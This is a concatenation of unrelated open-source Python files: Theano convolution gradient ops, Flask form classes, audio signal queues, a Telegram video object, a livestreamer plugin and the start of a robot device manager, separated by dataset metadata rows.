d_bottom = AbstractConv2d_gradInputs(self.imshp, self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(
weights, top, bottom.shape[-2:])
d_weights = AbstractConv2d_gradWeights(self.imshp, self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(
bottom, top, weights.shape[-2:])
return d_bottom, d_weights
class AbstractConv2d_gradWeights(BaseAbstractConv2d):
"""Gradient wrt. filters for `AbstractConv2d`.
:note: You will not want to use this directly, but rely on
Theano's automatic differentiation or graph optimization to
use it as needed.
"""
def __init__(self,
imshp=None,
kshp=None,
border_mode="valid",
subsample=(1, 1),
filter_flip=True):
super(AbstractConv2d_gradWeights, self).__init__(imshp, kshp,
border_mode, subsample, filter_flip)
# Update shape/height_width
def make_node(self, img, topgrad, shape):
if img.type.ndim != 4:
raise TypeError('img must be 4D tensor')
if topgrad.type.ndim != 4:
raise TypeError('topgrad must be 4D tensor')
shape = as_tensor_variable(shape)
broadcastable = [topgrad.broadcastable[1],
img.broadcastable[1],
False, False]
output = img.type.clone(broadcastable=broadcastable)()
return Apply(self, [img, topgrad, shape], [output])
def perform(self, node, inp, out_):
raise NotImplementedError('AbstractConv2d_gradWeight theano optimization failed')
def grad(self, inp, grads):
bottom, top = inp[:2]
weights, = grads
d_bottom = AbstractConv2d_gradInputs(self.imshp, self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(weights, top, bottom.shape[-2:])
d_top = AbstractConv2d(self.imshp,
self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(bottom, weights)
d_height_width = (theano.gradient.DisconnectedType()(),)
return (d_bottom, d_top) + d_height_width
def connection_pattern(self, node):
return [[1], [1], [0]] # no connection to height, width
class AbstractConv2d_gradInputs(BaseAbstractConv2d):
"""Gradient wrt. inputs for `AbstractConv2d`.
:note: You will not want to use this directly, but rely on
Theano's automatic differentiation or graph optimization to
use it as needed.
"""
def __init__(self,
imshp=None,
kshp=None,
border_mode="valid",
subsample=(1, 1),
filter_flip=True):
super(AbstractConv2d_gradInputs, self).__init__(imshp, kshp,
border_mode, subsample, filter_flip)
# Update shape/height_width
def make_node(self, kern, topgrad, shape):
if kern.type.ndim != 4:
raise TypeError('kern must be 4D tensor')
if topgrad.type.ndim != 4:
raise TypeError('topgrad must be 4D tensor')
shape = as_tensor_variable(shape)
broadcastable = [topgrad.type.broadcastable[0],
kern.type.broadcastable[1],
False, False]
output = kern.type.clone(broadcastable=broadcastable)()
return Apply(self, [kern, topgrad, shape], [output])
def perform(self, node, inp, out_):
raise NotImplementedError('AbstractConv2d_gradWeight theano optimization failed')
def grad(self, inp, grads):
weights, top = inp[:2]
bottom, = grads
d_weights = AbstractConv2d_gradWeights(self.imshp, self.kshp,
self.border_mode,
self.subsample)(bottom, top, weights.shape[-2:])
d_top = AbstractConv2d(self.imshp, self.kshp,
self.border_mode, self.subsample)(bottom, weights)
d_height_width = (theano.gradient.DisconnectedType()(),)
return (d_weights, d_top) + d_height_width
def connection_pattern(self, node):
return [[1], [1], [0]] # no connection to height, width
# Cpu Optmization
@local_optimizer([AbstractConv2d])
def local_conv2d_cpu(node):
if not isinstance(node.op, AbstractConv2d):
return None
img, kern = node.inputs
if ((not isinstance(img.type, TensorType) or
not isinstance(kern.type, TensorType))):
return None
if node.op.border_mode not in ['full', 'valid']:
return None
if not node.op.filter_flip:
# Not tested yet
return None
rval = cpu_conv2d(img, kern,
node.op.imshp, node.op.kshp,
border_mode=node.op.border_mode,
subsample=node.op.subsample)
return [rval]
register_specialize_device(local_conv2d_cpu, 'fast_compile')
@local_optimizer([AbstractConv2d_gradWeights])
def local_conv2d_gradweight_cpu(node):
img, topgrad, shape = node.inputs
if ((not isinstance(img.type, TensorType) or
not isinstance(topgrad.type, TensorType))):
return None
if node.op.border_mode not in ['full', 'valid']:
return None
if not node.op.filter_flip:
# Not tested yet
return
if node.op.border_mode == 'valid' and \
(node.op.subsample != (1, 1)):
# Use the gradient as defined in conv3D, because the implementation
# by Conv is slow (about 3x slower than conv3D, and probably 10x
# slower than it could be), nad incorrect when subsample > 2.
# build a "node", that should be equivalent to the one given by
# self.make_node, but using convGrad3D instead.
shuffled_img = img.dimshuffle(0, 2, 3, 'x', 1)
shuffled_topgrad = topgrad.dimshuffle(0, 2, 3, 'x', 1)
rval = convGrad3D(V=shuffled_img,
d=(node.op.subsample[0], node.op.subsample[1], 1),
WShape=(shuffled_topgrad.shape[4],
shape[0], shape[1], 1,
shuffled_img.shape[4]),
dCdH=shuffled_topgrad)
rval = theano.tensor.addbroadcast(rval, 3)
rval = rval.dimshuffle(0, 4, 1, 2)
rval = rval[:, :, ::-1, ::-1]
rval = patternbroadcast(rval, node.outputs[0].broadcastable)
return [rval]
dx, dy = node.op.subsample
if dx not in (1, 2) or dy not in (1, 2):
# Not implemented in the gradient of ConvOp
return None
if node.op.imshp is None:
op_imshp = (None, None, None, None)
else:
op_imshp = node.op.imshp
if node.op.kshp is None:
op_kshp = (None, None, None, None)
else:
op_kshp = node.op.kshp
if None in op_imshp or None in op_kshp:
if (dx, dy) != (1, 1):
# We cannot infer the shapes
return None
# Determine gradient on kernels
assert len(op_imshp) == 4 and len(op_kshp) == 4
outshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], node.op.subsample,
node.op.border_mode)
fulloutshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], (1, 1),
node.op.border_mode)
newimg = img.dimshuffle((1, 0, 2, 3))
newtopgrad = topgrad.dimshuffle((1, 0, 2, 3))
if node.op.border_mode == 'valid':
(img, filters) = (newimg, newtopgrad)
kshp_logical = fulloutshp
kshp_logical_top_aligned = False
imshp_logical = None
(bsize, nkern) = (op_imshp[1], op_kshp[0])
imshp = (op_imshp[0], op_imshp[2], op_imshp[3])
kshp = outshp
elif node.op.border_mode == 'full':
(img, filters) = (newtopgrad, newimg)
kshp_logical = None
kshp_logical_top_aligned = True
imshp_logical = (op_imshp[0],
fulloutshp[0],
fulloutshp[1])
(bsize, nkern) = (op_kshp[0], op_imshp[1])
imshp = (op_imshp[0], outshp[0], outshp[1])
kshp = op_imshp[2:]
else:
raise NotImplementedError(
'Only [full,valid] modes are currently supported.')
# Flip the kernels
filters = filters[:, :, ::-1, ::-1]
dw = ConvOp(imshp, kshp, nkern, bsize, 1, 1, output_mode='valid',
unroll_batch=None, unroll_kern=None, unroll_patch=None,
imshp_logical=imshp_logical,
kshp_logical=kshp_logical,
kshp_logical_top_aligned=kshp_logical_top_aligned,
direction_hint='bprop weights')
res = dw(img, filters)
if node.op.border_mode == 'valid':
res = res.dimshuffle((1, 0, 2, 3))
res = res[:, :, ::-1, ::-1]
res = patternbroadcast(res, node.outputs[0].broadcastable)
return [res]
register_specialize_device(local_conv2d_gradweight_cpu, 'fast_compile')
@local_optimizer([AbstractConv2d_gradInputs])
def local_conv2d_gradinputs_cpu(node):
kern, topgrad, shape = node.inputs
if ((not isinstance(kern.type, TensorType) or
not isinstance(topgrad.type, TensorType))):
return None
if node.op.border_mode not in ['full', 'valid']:
return None
if not node.op.filter_flip:
# Not tested yet
return None
# Conv 3d implementation, needed when subsample > 2
if node.op.border_mode == 'valid' and node.op.subsample != (1, 1):
kern = kern[:, :, ::-1, ::-1]
shuffled_kern = kern.dimshuffle(0, 2, 3, 'x', 1)
shuffled_topgrad = topgrad.dimshuffle(0, 2, 3, 'x', 1)
b = theano.tensor.zeros_like(shuffled_kern[0, 0, 0, 0, :])
rval = convTransp3D(W=shuffled_kern, b=b,
d=(node.op.subsample[0], node.op.subsample[1], 1),
H=shuffled_topgrad,
RShape=(shape[0], shape[1], 1))
rval = theano.tensor.addbroadcast(rval, 3)
rval = rval.dimshuffle(0, 4, 1, 2)
rval = patternbroadcast(rval, node.outputs[0].broadcastable)
return [rval]
# Conv2d Implementation
dx, dy = node.op.subsample
if dx not in (1, 2) or dy not in (1, 2):
# Not implemented in the gradient of ConvOp
return None
if node.op.imshp is None:
op_imshp = (None, None, None, None)
else:
op_imshp = node.op.imshp
if node.op.kshp is None:
op_kshp = (None, None, None, None)
else:
op_kshp = node.op.kshp
if None in op_imshp or None in op_kshp:
if (dx, dy) != (1, 1):
return None
mode = 'valid'
if not node.op.border_mode == 'full':
mode = 'full'
filters = kern.dimshuffle((1, 0, 2, 3))
filters = filters[:, :, ::-1, ::-1]
outshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], node.op.subsample,
node.op.border_mode)
fulloutshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], (1, 1),
node.op.border_mode)
nkern = op_imshp[1]
imshp = (op_kshp[0], outshp[0], outshp[1])
imshp_logical = (op_kshp[0], fulloutshp[0], fulloutshp[1])
din = ConvOp(imshp,
op_kshp[2:],
nkern,
op_imshp[0],
1, 1, output_mode=mode,
unroll_batch=None, unroll_kern=None,
unroll_patch=None,
imshp_logical=imshp_logical,
kshp_logical=None,
version=-1,
direction_hint='bprop inputs')
din = din(topgrad, filters)
din = patternbroadcast(din, node.outputs[0].broadcastable)
return [din]
register_specialize_device(local_conv2d_gradinputs_cpu, 'fast_compile')
| bsd-3-clause | -4,049,349,733,614,876,000 | 39.174954 | 95 | 0.576392 | false | 3.936305 | false | false | false |
mrf345/FQM | app/forms/customize.py | 1 | 13933 | import os
from functools import reduce
from wtforms.validators import InputRequired, Length, Optional
from flask_wtf.file import FileAllowed
from wtforms import StringField, SelectField, SubmitField, BooleanField, TextAreaField, FileField
from wtforms_components import TimeField
from app.forms.base import LocalizedForm
from app.forms.constents import (FONT_SIZES, BTN_COLORS, DURATIONS, TOUCH_TEMPLATES, DISPLAY_TEMPLATES,
ANNOUNCEMENT_REPEATS, ANNOUNCEMENT_REPEAT_TYPE, VISUAL_EFFECTS,
VISUAL_EFFECT_REPEATS, BOOLEAN_SELECT_1, TICKET_TYPES,
TICKET_REGISTERED_TYPES, SLIDE_EFFECTS, SLIDE_DURATIONS, EVERY_OPTIONS)
from app.database import Media
from app.constants import SUPPORTED_MEDIA_FILES, SUPPORTED_LANGUAGES, PRINTED_TICKET_SCALES
from app.helpers import get_tts_safely
class TouchScreenForm(LocalizedForm):
touch = SelectField('Select a template for Touch screen :',
coerce=int,
choices=TOUCH_TEMPLATES)
title = StringField('Enter a title :',
validators=[InputRequired('Must enter at least 5 letters and Title '
'should be maximum of 300 letters'),
Length(5, 300)])
hsize = SelectField('Choose title font size :',
coerce=str,
choices=FONT_SIZES)
hcolor = StringField('Select title font color :')
hfont = StringField('choose a font for title :')
hbg = StringField('Select heading background color :')
tsize = SelectField('choose task font size :',
coerce=str,
choices=FONT_SIZES)
tcolor = SelectField('choose tasks color :',
coerce=str,
choices=BTN_COLORS)
tfont = StringField('choose tasks font :')
msize = SelectField('choose message font size :',
coerce=str,
choices=FONT_SIZES)
mcolor = StringField('Select message font color :')
mfont = StringField('Choose message font :')
mduration = SelectField('choose motion effect duration of appearing :',
coerce=str,
choices=DURATIONS)
mbg = StringField('Select message background color :')
message = TextAreaField('Enter a notification message :',
validators=[InputRequired('Must enter at least 5 letter and Message'
'should be maximum of 300 letters ..'),
Length(5, 300)])
bcolor = StringField('Select a background color : ')
background = SelectField('Select background : ',
coerce=int,
choices=[(0, 'Use color selection')])
naudio = SelectField('Select audio notification : ',
coerce=int,
choices=[(0, 'Disable audio notification')])
submit = SubmitField('Apply')
def __init__(self, *args, **kwargs):
super(TouchScreenForm, self).__init__(*args, **kwargs)
for m in Media.get_all_images():
self.background.choices += [(m.id, f'{m.id}. {m.name}')]
for m in Media.get_all_audios():
self.naudio.choices += [(m.id, f'{m.id}. {m.name}')]
class DisplayScreenForm(LocalizedForm):
display = SelectField('Select a template for Display screen : ',
coerce=int,
choices=DISPLAY_TEMPLATES)
title = StringField('Enter a title : ',
validators=[InputRequired('Title should be maximum of 300 letters'),
Length(0, 300)])
background = SelectField('Select a background : ',
coerce=int,
choices=[(0, 'Use color selection')])
hsize = SelectField('Choose title font size : ',
coerce=str,
choices=FONT_SIZES)
hcolor = StringField('Choose title font color : ')
hfont = StringField('Choose title font : ')
hbg = StringField('Choose title background color : ')
tsize = SelectField('choose main heading office font size :',
coerce=str,
choices=FONT_SIZES)
tcolor = StringField('choose main heading office color : ')
tfont = StringField('choose main heading office font : ')
h2color = StringField('choose main heading ticket color : ')
h2size = SelectField('choose main heading ticket font size :',
coerce=str,
choices=FONT_SIZES)
h2font = StringField('choose main heading ticket font : ')
ssize = SelectField('choose secondary heading font size : ',
coerce=str,
choices=FONT_SIZES)
scolor = StringField('choose secondary heading color : ')
sfont = StringField('choose secondary heading font :')
mduration = SelectField('choose motion effect duration of appearing : ',
coerce=str,
choices=DURATIONS)
rrate = SelectField('choose page refresh rate : ',
coerce=str,
choices=DURATIONS)
effect = SelectField('choose visual motion effect for notification : ',
coerce=str,
choices=VISUAL_EFFECTS)
repeats = SelectField('choose motion effect number of repeats : ',
coerce=str,
choices=VISUAL_EFFECT_REPEATS)
anr = SelectField('Number of announcement repeating : ',
coerce=int,
choices=ANNOUNCEMENT_REPEATS)
anrt = SelectField('Type of announcement and notification repeating :',
coerce=str,
choices=ANNOUNCEMENT_REPEAT_TYPE)
naudio = SelectField('Select audio notification : ',
coerce=int,
choices=[(0, 'Disable audio notification')])
bgcolor = StringField('Select a background color : ')
prefix = BooleanField('Attach prefix office letter: ')
always_show_ticket_number = BooleanField('Always show ticket number: ')
wait_for_announcement = BooleanField('Wait for announcement to finish:')
hide_ticket_index = BooleanField('Hide ticket index number:')
submit = SubmitField('Apply')
for shortcode in get_tts_safely().keys():
locals()[f'check{shortcode}'] = BooleanField()
def __init__(self, *args, **kwargs):
super(DisplayScreenForm, self).__init__(*args, **kwargs)
for m in Media.get_all_images():
self.background.choices += [(m.id, f'{m.id}. {m.name}')]
for m in Media.get_all_audios():
self.naudio.choices += [(m.id, f'{m.id}. {m.name}')]
for shortcode, bundle in get_tts_safely().items():
self[f'check{shortcode}'].label = self.translate(bundle.get('language'))
class SlideAddForm(LocalizedForm):
title = StringField('Enter a slide title :')
hsize = SelectField('Select a title font size :',
coerce=str,
choices=FONT_SIZES)
hcolor = StringField('Select a title font color :')
hfont = StringField('Select a title font :')
hbg = StringField('Select title background color :')
subti = StringField('Enter a subtitle :')
tsize = SelectField('Select subtitle font size :',
coerce=str,
choices=FONT_SIZES)
tcolor = StringField('Select sub title color :')
tfont = StringField('Select subtitle font :')
tbg = StringField('Select subtitle background color :')
background = SelectField('Select background : ',
coerce=int,
choices=[(0, 'Use color selection')])
bgcolor = StringField('Select background color : ')
submit = SubmitField('Add a slide')
def __init__(self, *args, **kwargs):
super(SlideAddForm, self).__init__(*args, **kwargs)
for m in Media.get_all_images():
self.background.choices += [(m.id, f'{m.id}. {m.name}')]
class SlideSettingsForm(LocalizedForm):
status = SelectField('Disable or enable slide-show :',
coerce=int,
choices=BOOLEAN_SELECT_1)
effect = SelectField('Select transition effect :',
coerce=str,
choices=SLIDE_EFFECTS)
navigation = SelectField('Slide navigation bars :',
coerce=int,
choices=BOOLEAN_SELECT_1)
rotation = SelectField('Slide images rotation :',
coerce=str,
choices=SLIDE_DURATIONS)
submit = SubmitField('Apply')
class MultimediaForm(LocalizedForm):
mf = FileField('Select multimedia file :',
validators=[FileAllowed(
reduce(lambda sum, group: sum + group, SUPPORTED_MEDIA_FILES),
'make sure you followed the given conditions !')])
submit = SubmitField('Upload')
class VideoForm(LocalizedForm):
video = SelectField('Select uploaded video to use : ',
coerce=int,
choices=[(0, 'Do not assign video')])
enable = SelectField('Enable or disable video : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
ar = SelectField('Auto replaying the video : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
controls = SelectField('Enable or disable video controls : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
mute = SelectField('Mute sound : ',
coerce=int,
choices=BOOLEAN_SELECT_1)
submit = SubmitField('Set video')
def __init__(self, defLang='en', *args, **kwargs):
super(VideoForm, self).__init__(*args, **kwargs)
videos = Media.get_all_videos()
for v in videos:
self.video.choices.append((v.id, f'{v.id}. {v.name}'))
if not videos:
self.video.choices = [(0, self.translate('No videos were found'))]
class TicketForm(LocalizedForm):
kind = SelectField('Select type of ticket to use : ',
coerce=int,
choices=TICKET_TYPES)
value = SelectField('Select a value of registering : ',
coerce=int,
choices=TICKET_REGISTERED_TYPES)
langu = SelectField('Select language of printed ticket : ',
choices=list(SUPPORTED_LANGUAGES.items()),
coerce=str)
printers = SelectField('Select a usb printer : ',
coerce=str,
choices=[('00', 'No printers were found')])
scale = SelectField('Select font scaling measurement for printed tickets :',
coerce=int)
header = StringField('Enter a text header : ')
sub = StringField('Enter a text sub-header : ')
submit = SubmitField('Set ticket')
def __init__(self, inspected_printers_from_view, lp_printing, *args, **kwargs):
super(TicketForm, self).__init__(*args, **kwargs)
# NOTE: here so it won't be localized.
self.scale.choices = [(i, f'x{i}') for i in PRINTED_TICKET_SCALES]
if inspected_printers_from_view:
self.printers.choices = []
for printer in inspected_printers_from_view:
if os.name == 'nt' or lp_printing:
self.printers.choices.append((f'{printer}', f'Printer Name: {printer}'))
else:
vendor, product = printer.get('vendor'), printer.get('product')
in_ep, out_ep = printer.get('in_ep'), printer.get('out_ep')
identifier = f'{vendor}_{product}'
if in_ep and out_ep:
identifier += f'_{in_ep}_{out_ep}'
self.printers.choices.append((identifier, f'Printer ID: {vendor}_{product}'))
class AliasForm(LocalizedForm):
_message = 'Alias must be at least of 2 and at most 10 letters'
office = StringField('Enter alias for office : ',
validators=[InputRequired(_message), Length(2, 10)])
task = StringField('Enter alias for task : ',
validators=[InputRequired(_message), Length(2, 10)])
ticket = StringField('Enter alias for ticket : ',
validators=[InputRequired(_message), Length(2, 10)])
name = StringField('Enter alias for name : ',
validators=[InputRequired(_message), Length(2, 10)])
number = StringField('Enter alias for number : ',
validators=[InputRequired(_message), Length(2, 10)])
class BackgroundTasksForms(LocalizedForm):
_every_message = 'Time range to repeat the task within :'
_time_message = 'Specific time to execute the task in :'
cache_tts_enabled = BooleanField('Enable caching text-to-speech announcements :')
cache_tts_every = SelectField(_every_message,
coerce=str,
choices=[(o, o) for o in EVERY_OPTIONS])
delete_tickets_enabled = BooleanField('Enable deleting tickets :')
delete_tickets_every = SelectField(_every_message,
coerce=str,
choices=[(o, o) for o in EVERY_OPTIONS])
delete_tickets_time = TimeField(_time_message,
validators=[Optional()])
| mpl-2.0 | -1,921,860,395,263,956,500 | 46.879725 | 104 | 0.556162 | false | 4.596833 | false | false | false |
bburan/psiexperiment | psi/controller/queue.py | 1 | 10732 | import logging
log = logging.getLogger(__name__)
import itertools
import copy
import uuid
from collections import deque
import numpy as np
from enaml.core.api import Declarative
class QueueEmptyError(Exception):
pass
class QueueBufferEmptyError(Exception):
pass
def as_iterator(x):
if x is None:
x = 0
try:
x = iter(x)
except TypeError:
x = itertools.cycle([x])
return x
class AbstractSignalQueue:
def __init__(self):
'''
Parameters
----------
fs : float
Sampling rate of output that will be using this queue
initial_delay : float
Delay, in seconds, before starting playout of queue
filter_delay : float
Filter delay, in seconds, of the output. The starting timestamp of
each trial will be adjusted by the filter delay to reflect the true
time at which the trial reaches the output of the DAC.
'''
self._delay_samples = 0
self._data = {} # list of generators
self._ordering = [] # order of items added to queue
self._source = None
self._samples = 0
self._notifiers = []
def set_fs(self, fs):
# Sampling rate at which samples will be generated.
self._fs = fs
def set_t0(self, t0):
# Sample at which queue was started relative to experiment acquisition
# start.
self._t0 = t0
def _add_source(self, source, trials, delays, duration, metadata):
key = uuid.uuid4()
if duration is None:
duration = source.shape[-1]/self._fs
data = {
'source': source,
'trials': trials,
'delays': as_iterator(delays),
'duration': duration,
'metadata': metadata,
}
self._data[key] = data
return key
def get_max_duration(self):
def get_duration(source):
try:
return source.get_duration()
except AttributeError:
return source.shape[-1]/self._fs
return max(get_duration(d['source']) for d in self._data.values())
def connect(self, callback):
self._notifiers.append(callback)
def _notify(self, trial_info):
for notifier in self._notifiers:
notifier(trial_info)
def insert(self, source, trials, delays=None, duration=None, metadata=None):
k = self._add_source(source, trials, delays, duration, metadata)
self._ordering.insert(k)
return k
def append(self, source, trials, delays=None, duration=None, metadata=None):
k = self._add_source(source, trials, delays, duration, metadata)
self._ordering.append(k)
return k
def count_factories(self):
return len(self._ordering)
def count_trials(self):
return sum(v['trials'] for v in self._data.values())
def is_empty(self):
return self.count_trials() == 0
def next_key(self):
raise NotImplementedError
def pop_next(self, decrement=True):
key = self.next_key()
return key, self.pop_key(key, decrement=decrement)
def pop_key(self, key, decrement=True):
'''
Removes one trial of specified key from queue and returns waveform
'''
data = self._data[key]
if decrement:
self.decrement_key(key)
return data
def remove_key(self, key):
'''
Removes key from queue entirely, regardless of number of trials
'''
self._data.pop(key)
self._ordering.remove(key)
def decrement_key(self, key, n=1):
if key not in self._ordering:
raise KeyError('{} not in queue'.format(key))
self._data[key]['trials'] -= n
if self._data[key]['trials'] <= 0:
self.remove_key(key)
def _get_samples_waveform(self, samples):
if samples > len(self._source):
waveform = self._source
complete = True
else:
waveform = self._source[:samples]
self._source = self._source[samples:]
complete = False
return waveform, complete
def _get_samples_generator(self, samples):
samples = min(self._source.get_remaining_samples(), samples)
waveform = self._source.next(samples)
complete = self._source.is_complete()
return waveform, complete
def next_trial(self, decrement=True):
'''
Setup the next trial
This has immediate effect. If you call this (from external code), the
current trial will not finish.
'''
key, data = self.pop_next(decrement=decrement)
self._source = data['source']
try:
self._source.reset()
self._get_samples = self._get_samples_generator
except AttributeError:
self._source = data['source']
self._get_samples = self._get_samples_waveform
delay = next(data['delays'])
self._delay_samples = int(delay*self._fs)
if self._delay_samples < 0:
raise ValueError('Invalid option for delay samples')
queue_t0 = self._samples/self._fs
uploaded = {
't0': self._t0 + queue_t0, # Time re. acq. start
'queue_t0': queue_t0, # Time re. queue start
'duration': data['duration'], # Duration of token
'key': key, # Unique ID
'metadata': data['metadata'], # Metadata re. token
}
self._notify(uploaded)
def pop_buffer(self, samples, decrement=True):
'''
Return the requested number of samples
Removes stack of waveforms in order determind by `pop`, but only returns
requested number of samples. If a partial fragment of a waveform is
returned, the remaining part will be returned on subsequent calls to
this function.
'''
# TODO: This is a bit complicated and I'm not happy with the structure.
# It should be simplified quite a bit. Cleanup?
waveforms = []
queue_empty = False
# Load samples from current source
if samples > 0 and self._source is not None:
# That this is a dynamic function that is set when the next
# source is loaded (see below in this method).
waveform, complete = self._get_samples(samples)
samples -= len(waveform)
self._samples += len(waveform)
waveforms.append(waveform)
if complete:
self._source = None
# Insert intertrial interval delay
if samples > 0 and self._delay_samples > 0:
n_padding = min(self._delay_samples, samples)
waveform = np.zeros(n_padding)
samples -= n_padding
self._samples += len(waveform)
self._delay_samples -= n_padding
waveforms.append(waveform)
# Get next source
if (self._source is None) and (self._delay_samples == 0):
try:
self.next_trial(decrement)
except QueueEmptyError:
queue_empty = True
waveform = np.zeros(samples)
waveforms.append(waveform)
log.info('Queue is now empty')
if (samples > 0) and not queue_empty:
waveform, queue_empty = self.pop_buffer(samples, decrement)
waveforms.append(waveform)
samples -= len(waveform)
waveform = np.concatenate(waveforms, axis=-1)
return waveform, queue_empty
class FIFOSignalQueue(AbstractSignalQueue):
'''
Return waveforms based on the order they were added to the queue
'''
def next_key(self):
if len(self._ordering) == 0:
raise QueueEmptyError
return self._ordering[0]
class InterleavedFIFOSignalQueue(AbstractSignalQueue):
'''
Return waveforms based on the order they were added to the queue; however,
trials are interleaved.
'''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._i = -1
self._complete = False
def next_key(self):
if self._complete:
raise QueueEmptyError
self._i = (self._i + 1) % len(self._ordering)
return self._ordering[self._i]
def decrement_key(self, key, n=1):
if key not in self._ordering:
raise KeyError('{} not in queue'.format(key))
self._data[key]['trials'] -= n
for key, data in self._data.items():
if data['trials'] > 0:
return
self._complete = True
def count_trials(self):
return sum(max(v['trials'], 0) for v in self._data.values())
class RandomSignalQueue(AbstractSignalQueue):
'''
Return waveforms in random order
'''
def next_key(self):
if len(self._ordering) == 0:
raise QueueEmptyError
i = np.random.randint(0, len(self._ordering))
return self._ordering[i]
class BlockedRandomSignalQueue(InterleavedFIFOSignalQueue):
def __init__(self, seed=0, *args, **kwargs):
super().__init__(*args, **kwargs)
self._i = []
self._rng = np.random.RandomState(seed)
def next_key(self):
if self._complete:
raise QueueEmptyError
if not self._i:
# The blocked order is empty. Create a new set of random indices.
i = np.arange(len(self._ordering))
self._rng.shuffle(i)
self._i = i.tolist()
i = self._i.pop()
return self._ordering[i]
class GroupedFIFOSignalQueue(FIFOSignalQueue):
def __init__(self, group_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self._i = -1
self._group_size = group_size
def next_key(self):
if len(self._ordering) == 0:
raise QueueEmptyError
self._i = (self._i + 1) % self._group_size
return self._ordering[self._i]
def decrement_key(self, key, n=1):
if key not in self._ordering:
raise KeyError('{} not in queue'.format(key))
self._data[key]['trials'] -= n
# Check to see if the group is complete. Return from method if not
# complete.
for key in self._ordering[:self._group_size]:
if self._data[key]['trials'] > 0:
return
# If complete, remove the keys
for key in self._ordering[:self._group_size]:
self.remove_key(key)
queues = {
'first-in, first-out': FIFOSignalQueue,
'interleaved first-in, first-out': InterleavedFIFOSignalQueue,
'random': RandomSignalQueue,
}
| mit | -7,834,932,730,603,202,000 | 29.750716 | 80 | 0.573891 | false | 4.093059 | false | false | false |
jacopodl/TbotPy | src/Object/Video.py | 1 | 2539 | """
<This library provides a Python interface for the Telegram Bot API>
Copyright (C) <2015> <Jacopo De Luca>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from Object.AUFile import AUFile
from Object.PhotoSize import PhotoSize
class Video(AUFile):
"""
This object represents a video file.
"""
def __init__(self, file_id, width, height, duration, thumb=None, mime_type="", file_size=0):
"""
:param file_id: Unique identifier for this file
:type file_id: str
:param width: Video width as defined by sender
:type width: int
:param height: Video height as defined by sender
:type height: int
:param duration: Duration of the video in seconds as defined by sender
:type duration: int
:param thumb: Optional. Video thumbnail
:type thumb: PhotoSize
:param mime_type: Optional. Mime type of a file as defined by sender
:type mime_type: str
:param file_size: Optional. File size
:type file_size: int
"""
super().__init__(file_id, file_size, mime_type=mime_type)
self.width = width
self.height = height
self.duration = duration
self.thumb = thumb
@staticmethod
def build_from_json(jvideo):
"""
:param jvideo: A dictionary that contains JSON-parsed object
:type jvideo: dict
:rtype: Video
"""
thumb = None
mime_type = ""
file_size = 0
if 'thumb' in jvideo.keys():
thumb = PhotoSize.build_from_json(jvideo['thumb'])
if 'mime_type' in jvideo.keys():
mime_type = jvideo['mime_type']
if 'file_size' in jvideo.keys():
file_size = int(jvideo['file_size'])
return Video(jvideo['file_id'], int(jvideo['width']), int(jvideo['height']), int(jvideo['duration']), thumb,
mime_type, file_size)
| gpl-3.0 | -2,514,527,228,052,287,500 | 35.797101 | 116 | 0.629382 | false | 4.182867 | false | false | false |
guymakam/Kodi-Israel | plugin.video.israelive/resources/lib/livestreamer/plugins/connectcast.py | 2 | 2066 | import re
from livestreamer.plugin import Plugin
from livestreamer.plugin.api import http, validate
from livestreamer.stream import HTTPStream, RTMPStream
from livestreamer.plugin.api.support_plugin import common_jwplayer as jwplayer
BASE_VOD_URL = "https://www.connectcast.tv"
SWF_URL = "https://www.connectcast.tv/jwplayer/jwplayer.flash.swf"
_url_re = re.compile("http(s)?://(\w+\.)?connectcast.tv/")
_smil_schema = validate.Schema(
validate.union({
"base": validate.all(
validate.xml_find("head/meta"),
validate.get("base"),
validate.url(scheme="rtmp")
),
"videos": validate.all(
validate.xml_findall("body/video"),
[validate.get("src")]
)
})
)
class ConnectCast(Plugin):
@classmethod
def can_handle_url(self, url):
return _url_re.match(url)
def _get_smil_streams(self, url):
res = http.get(url, verify=False)
smil = http.xml(res, schema=_smil_schema)
for video in smil["videos"]:
stream = RTMPStream(self.session, {
"rtmp": smil["base"],
"playpath": video,
"swfVfy": SWF_URL,
"pageUrl": self.url,
"live": True
})
yield "live", stream
def _get_streams(self):
res = http.get(self.url)
playlist = jwplayer.parse_playlist(res)
if not playlist:
return
for item in playlist:
for source in item["sources"]:
filename = source["file"]
if filename.endswith(".smil"):
# TODO: Replace with "yield from" when dropping Python 2.
for stream in self._get_smil_streams(filename):
yield stream
elif filename.startswith("/"):
name = source.get("label", "vod")
url = BASE_VOD_URL + filename
yield name, HTTPStream(self.session, url)
break
__plugin__ = ConnectCast
| gpl-2.0 | 439,076,412,555,663,100 | 29.382353 | 78 | 0.547919 | false | 3.927757 | false | false | false |
harmsm/rpyBot | rpyBot/manager.py | 2 | 7209 | __description__ = \
"""
"""
__author__ = "Michael J. Harms"
__date__ = "2014-06-18"
import multiprocessing, time, random, copy
from rpyBot.messages import RobotMessage
class DeviceManager:
"""
Class for aynchronous communication and integration between all of the
devices attached to the robot. It runs on the main thread and then spawns
a thread for each device attached to the robot.
"""
def __init__(self,device_list=[],poll_interval=0.1,verbosity=0):
"""
Initialize.
device_list: list of RobotDevice instances
poll_interval: how often to poll messaging queues (in seconds)
verbosity: whether or not to spew messages to standard out
"""
self.device_list = device_list
self.poll_interval = poll_interval
self.verbosity = verbosity
self.queue = []
self.loaded_devices = []
self.loaded_devices_dict = {}
self.device_processes = []
self.manager_id = int(random.random()*1e9)
self._run_loop = False
def start(self):
"""
Start the main loop running.
"""
self._run_loop = True
self._run()
def stop(self):
"""
